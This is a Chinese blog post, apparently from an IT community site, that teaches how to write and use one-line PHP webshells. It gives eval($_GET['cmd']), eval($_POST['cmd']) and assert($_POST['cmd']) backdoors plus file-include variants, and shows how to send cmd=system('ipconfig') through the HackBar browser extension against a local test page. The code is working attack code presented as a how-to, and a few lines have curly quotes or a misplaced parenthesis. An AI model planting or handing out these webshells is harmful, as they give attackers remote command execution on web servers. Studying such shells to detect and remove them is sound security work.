一句话木马


大力蜜粉
大力蜜粉 2022-09-27 09:33:48 50877
分类专栏: 资讯

1.Get

第一步:先创建一个get.php文档

第二步:用notepad++打开,编辑,输入代码

header('Content-Type:text/html;charset=gbk');     因为浏览器不同,有可能出现乱码,输入这个命

令,可以避免这个问题

<?php @eval($_GET['cmd']);?>

 第三步:用浏览器打开,就可以查看我们的信息

 2.post

post步骤和get基本相同

第一步:新建一个post文档

第二步:用notepad++打开,编辑,输入代码

header('Content-Type:text/html;charset=gbk');  

<?php @eval($_POST[‘cmd’]);?>

        第三步:用浏览器打开,点击F12,找到HackBar,(注意这个HackBar是一个浏览器的插件,

需要我们使用火狐浏览器,在扩张里面搜这个插件,点击安装即可)

这里是安装好的样子

 输入代码

http://127.0.0.1/post.php

 点击下方Past data,输入cmd=system(‘ipconfig’);

 最后点击execute即可

 3.assert

第一步:创建assert文档

第二步:用notepad++打开,编辑,输入代码

<?php  @assert($_POST[‘cmd’])

第三步:打开浏览器,点击F12,输入

Cmd=system(‘ipconfig’);

 4.GET文件包含

第一步:创建一个新的2.php文档

第二步:在新建的2.php中输入

<?php phpinfo();?>

 第三步:在我们一开始的get代码中,加上一条include  “2.php”;

 第三步:用浏览器打开即可

 5.post文件包含

第一步:因为我们已经创建过新的文档(2.php),在post.php的基础上,输入

     <?php include “2.php”;

  @eval ($_POST[‘cmd’];)

?>

 

第二步:和get相同用浏览器打开,点击F12,找到HackBar,输入代码

http://127.0.0.1/post.php

点击下方Past data,输入cmd=system(‘ipconfig’);

文章知识点与官方知识档案匹配,可进一步学习相关知识

网站声明:如果转载,请联系本站管理员。否则一切后果自行承担。

本文链接:https://www.xckfsq.com/news/show.html?id=10464
赞同 0
评论 0 条
大力蜜粉L0
粉丝 0 发表 10 + 关注 私信
上周热门
如何使用 StarRocks 管理和优化数据湖中的数据?  2959
【软件正版化】软件正版化工作要点  2878
统信UOS试玩黑神话:悟空  2843
信刻光盘安全隔离与信息交换系统  2737
镜舟科技与中启乘数科技达成战略合作,共筑数据服务新生态  1270
grub引导程序无法找到指定设备和分区  1235
华为全联接大会2024丨软通动力分论坛精彩议程抢先看!  165
点击报名 | 京东2025校招进校行程预告  164
2024海洋能源产业融合发展论坛暨博览会同期活动-海洋能源与数字化智能化论坛成功举办  163
华为纯血鸿蒙正式版9月底见!但Mate 70的内情还得接着挖...  159
本周热议
我的信创开放社区兼职赚钱历程 40
今天你签到了吗? 27
信创开放社区邀请他人注册的具体步骤如下 15
如何玩转信创开放社区—从小白进阶到专家 15
方德桌面操作系统 14
我有15积分有什么用? 13
用抖音玩法闯信创开放社区——用平台宣传企业产品服务 13
如何让你先人一步获得悬赏问题信息?(创作者必看) 12
2024中国信创产业发展大会暨中国信息科技创新与应用博览会 9
中央国家机关政府采购中心:应当将CPU、操作系统符合安全可靠测评要求纳入采购需求 8

加入交流群

请使用微信扫一扫!